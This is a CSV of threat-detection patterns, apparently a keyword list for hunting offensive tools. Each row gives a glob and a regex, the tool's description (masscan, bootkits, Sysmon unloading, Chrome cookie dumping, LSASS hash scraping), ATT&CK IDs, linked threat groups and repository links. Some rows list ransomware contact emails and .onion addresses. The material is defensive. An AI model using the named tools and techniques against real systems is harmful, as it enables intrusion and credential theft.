"*masscan -c *",".{0,1000}masscan\s\-c\s.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","#linux","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","51659"
"*masscan failed with error: *",".{0,1000}masscan\sfailed\swith\serror\:\s.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","51660"
"*masscan --nmap*",".{0,1000}masscan\s\-\-nmap.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","#linux","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","51661"
"*masscan -p*",".{0,1000}masscan\s\-p.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","#linux","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","51662"
"*masscan* -p*",".{0,1000}masscan.{0,1000}\s\s\-p.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","#linux","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","51663"
"*masscan.exe *",".{0,1000}masscan\.exe\s.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","51664"
"*massdns -r *.txt*",".{0,1000}massdns\s\-r\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","51665"
"*mastadonster@onionmail.org*",".{0,1000}mastadonster\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51666"
"*master/bootkit/src*",".{0,1000}master\/bootkit\/src.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","N/A","6","528","67","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z","51667"
"*master/EncryptedZIP*",".{0,1000}master\/EncryptedZIP.{0,1000}","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","51668"
"*master/HookDetector*",".{0,1000}master\/HookDetector.{0,1000}","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","51669"
"*master/ImplantSSP/*",".{0,1000}master\/ImplantSSP\/.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","51670"
"*master/SwampThing*",".{0,1000}master\/SwampThing.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","51671"
"*master/UnquotedPath*",".{0,1000}master\/UnquotedPath.{0,1000}","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","51672"
"*MatheuZSecurity/D3m0n1z3dShell*",".{0,1000}MatheuZSecurity\/D3m0n1z3dShell.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","51676"
"*matterpreter/DefenderCheck*",".{0,1000}matterpreter\/DefenderCheck.{0,1000}","offensive_tool_keyword","DefenderCheck","Identifies the bytes that Microsoft Defender flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","N/A","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","51678"
"*matterpreter/Shhmon*",".{0,1000}matterpreter\/Shhmon.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","N/A","3","228","37","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z","51679"
"*MattKeeley/Spoofy*",".{0,1000}MattKeeley\/Spoofy.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","51680"
"*MayankPandey01/Jira-Lens*",".{0,1000}MayankPandey01\/Jira\-Lens.{0,1000}","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1083 - T1065 - T1204 - T1087 - T1203","TA0007 - TA0005 - TA0001","N/A","N/A","Reconnaissance","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","N/A","4","318","52","2024-12-31T20:06:51Z","2021-11-14T18:37:47Z","51681"
"*Mayyhem/Maestro*",".{0,1000}Mayyhem\/Maestro.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","1","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","51682"
"*Mayyhem/SharpSCCM*",".{0,1000}Mayyhem\/SharpSCCM.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","1","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","51683"
"*Mazars-Tech/AD_Miner*",".{0,1000}Mazars\-Tech\/AD_Miner.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","1","N/A","AD Enumeration","7","10","1290","131","2025-03-12T10:53:09Z","2023-09-26T12:36:59Z","51684"
"*mazedecrypt.top*",".{0,1000}mazedecrypt\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51686"
"*mblogci3rudehaagbryjznltdp33ojwzkq6hn2pckvjq33rycmzczpid.onion*",".{0,1000}mblogci3rudehaagbryjznltdp33ojwzkq6hn2pckvjq33rycmzczpid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51687"
"*mbrg/power-pwn*",".{0,1000}mbrg\/power\-pwn.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","51688"
"*mbrlkbtq5jonaqkurjwmxftytyn2ethqvbxfu4rgjbkkknndqwae6byd.onion*",".{0,1000}mbrlkbtq5jonaqkurjwmxftytyn2ethqvbxfu4rgjbkkknndqwae6byd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51689"
"*mcafee_epo2john.py*",".{0,1000}mcafee_epo2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","51690"
"*McpManagementPotato.*",".{0,1000}McpManagementPotato\..{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","N/A","10","4","356","48","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z","51691"
"*md c:\chaos-container*",".{0,1000}md\sc\:\\chaos\-container.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","51693"
"*md.mirrors.hacktegic.com/blackarch/*/os/*",".{0,1000}md\.mirrors\.hacktegic\.com\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","51694"
"*Md4-128.unverified.test-vectors.txt*",".{0,1000}Md4\-128\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","51695"
"*Md5-128.unverified.test-vectors.txt*",".{0,1000}Md5\-128\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","51696"
"*mdavis332/DomainPasswordSpray*",".{0,1000}mdavis332\/DomainPasswordSpray.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","51697"
"*MDE_Enum /local /asr*",".{0,1000}MDE_Enum\s\/local\s\/asr.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","51698"
"*MDE_Enum /local /paths*",".{0,1000}MDE_Enum\s\/local\s\/paths.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","51699"
"*MDExclusionParser-main*",".{0,1000}MDExclusionParser\-main.{0,1000}","offensive_tool_keyword","MDExclusionParser","PowerShell script to quickly scan Event Log ID 5007 and 1121 for published Windows Defender Exclusions and Attack Surface Reduction (ASR) rule configuration.","T1562.001","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/ViziosDe/MDExclusionParser","1","1","N/A","N/A","5","1","6","1","2024-06-12T14:17:08Z","2024-06-12T11:56:07Z","51700"
"*mDNSSpoofer*",".{0,1000}mDNSSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51702"
"*mdornseif/DeNiSe*",".{0,1000}mdornseif\/DeNiSe.{0,1000}","offensive_tool_keyword","DeNiSe","DeNiSe is a proof of concept for tunneling TCP over DNS in Python","T1071.004 - T1048.003","TA0011 - TA0010 - TA0001","N/A","N/A","C2","https://github.com/mdornseif/DeNiSe","1","1","N/A","N/A","10","10","28","13","2021-12-17T18:03:33Z","2010-01-15T07:43:14Z","51703"
"*MDSDLL_x64.dll*",".{0,1000}MDSDLL_x64\.dll.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","51704"
"*MDSDLL_x86.dll*",".{0,1000}MDSDLL_x86\.dll.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","51705"
"*mdsecactivebreach/CACTUSTORCH*",".{0,1000}mdsecactivebreach\/CACTUSTORCH.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","51706"
"*mdsecactivebreach/CACTUSTORCH*",".{0,1000}mdsecactivebreach\/CACTUSTORCH.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","10","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","51707"
"*mdsecactivebreach/DragonCastle*",".{0,1000}mdsecactivebreach\/DragonCastle.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","1","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","51708"
"*mdsecactivebreach/Farmer*",".{0,1000}mdsecactivebreach\/Farmer.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","51709"
"*mdsecactivebreach/SharpShooter*",".{0,1000}mdsecactivebreach\/SharpShooter.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","51710"
"*mdsecactivebreach/WMIPersistence*",".{0,1000}mdsecactivebreach\/WMIPersistence.{0,1000}","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","1","N/A","N/A","N/A","2","113","30","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z","51711"
"*Meckazin/ChromeKatz*",".{0,1000}Meckazin\/ChromeKatz.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","51712"
"*med0x2e/GadgetToJScript*",".{0,1000}med0x2e\/GadgetToJScript.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tool","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","N/A","10","10","942","168","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z","51713"
"*med0x2e/SigFlip*",".{0,1000}med0x2e\/SigFlip.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","51714"
"*med0x2e/SigFlip*",".{0,1000}med0x2e\/SigFlip.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","51715"
"*media_variable_file_cryptography.py*",".{0,1000}media_variable_file_cryptography\.py.{0,1000}","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","N/A","4","368","57","2024-05-29T15:07:15Z","2022-08-12T22:16:46Z","51716"
"*medusa.support@onionmail.org*",".{0,1000}medusa\.support\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51718"
"*medusakxxtp3uo7vusntvubnytaph4d3amxivbggl3hnhpk2nmus34yd.onion*",".{0,1000}medusakxxtp3uo7vusntvubnytaph4d3amxivbggl3hnhpk2nmus34yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51719"
